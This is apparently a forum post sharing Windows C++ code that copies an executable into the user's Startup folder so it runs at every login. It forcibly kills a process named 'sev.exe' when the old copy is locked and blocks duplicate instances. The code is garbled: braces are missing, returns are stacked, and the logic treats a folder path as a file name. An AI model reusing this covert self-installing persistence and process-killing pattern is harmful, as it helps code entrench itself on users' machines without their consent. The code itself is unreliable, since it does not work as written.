guys here are my self install codes for any applications
it will copy itself to the startup folder and run
it's not very efficient so i need u guys to advise on improvements
works on win98,winxp
codes that have been commented out are some of the stuff i previously tested and found to be unsuccessful

char *current_directory = new char[MAX_PATH]; // rem to delete this
	char *window_dir = new char[MAX_PATH]; // rem to delete this
	GetModuleFileName(theApp.m_hInstance, current_directory, MAX_PATH);

	SHGetSpecialFolderPath(NULL,window_dir, CSIDL_STARTUP,TRUE);

//	CopyFile(current_directory,window_dir,FALSE ) ;

	if( stricmp (current_directory , window_dir) != 0)   // i am not in the correct dir
		int set_file_result = SetFileAttributes(window_dir,FILE_ATTRIBUTE_NORMAL);
		if (set_file_result == 0)// if i cant set attrib, means wind_dir is empty, if i can set, means wind_dir not empty and i gotta del
			CopyFile(current_directory,window_dir,FALSE ) ;
			delete[] window_dir;
			return 55;
			return 0;

		BOOL delete_result = DeleteFile( window_dir);
		int bb = GetLastError();
		if(delete_result == 0) // delete fails because of access denied

//BOOL seek_and_kill(char *window_dir ) , to kill the currently process so as to allow me to run

				HANDLE hProcessSnap;
				PROCESSENTRY32 pe32;

  // Take a snapshot of all processes in the system.
				hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
				if( hProcessSnap == INVALID_HANDLE_VALUE )
					return( FALSE );
				pe32.dwSize = sizeof( PROCESSENTRY32 );

  // Retrieve information about the first process,
  // and exit if unsuccessful
				if( !Process32First( hProcessSnap, &pe32 ) )
					CloseHandle( hProcessSnap );     // Must clean up the snapshot object!
					return( FALSE );
				BOOL next_result = 1;
 // TCHAR *szExeFile = {pe32.szExeFile};
				while(    ( stricmp( pe32.szExeFile , "sev.exe") != 0) &&  (next_result != FALSE )    )
					  next_result = Process32Next(hProcessSnap, &pe32);
				HANDLE kill_this_process = OpenProcess( PROCESS_ALL_ACCESS,0, pe32.th32ProcessID);

				TerminateProcess(kill_this_process , 999);
				// return 1;


			while(!DeleteFile( window_dir) )
		CopyFile(current_directory,window_dir,FALSE ) ;
		delete[] window_dir;
		return 55;

	else // else if i am in the correct dir, i dont want 2 instance of the same thing
		HANDLE hProcessSnap;

  // Take a snapshot of all processes in the system.
		hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
		if( hProcessSnap == INVALID_HANDLE_VALUE )
			return( FALSE );
		pe32.dwSize = sizeof( PROCESSENTRY32 );
  // Retrieve information about the first process,
  // and exit if unsuccessful
		if( !Process32First( hProcessSnap, &pe32 ) )
			CloseHandle( hProcessSnap );     // Must clean up the snapshot object!
			return( FALSE );
		BOOL next_result = 1;
		BOOL duplicate = FALSE;
 // TCHAR *szExeFile = {pe32.szExeFile};
		while(   next_result != FALSE )
			if(  (stricmp( pe32.szExeFile , "sev.exe") == 0)   &&(duplicate == TRUE))
				return 55;
			if( ( stricmp( pe32.szExeFile , "sev.exe") == 0)    &&(duplicate == FALSE))
				duplicate = TRUE;
			next_result = Process32Next(hProcessSnap, &pe32);
			if(  (stricmp( pe32.szExeFile , "sev.exe") == 0)   &&(duplicate == TRUE))
			//	return 55;
	delete[] window_dir;
	delete[] current_directory;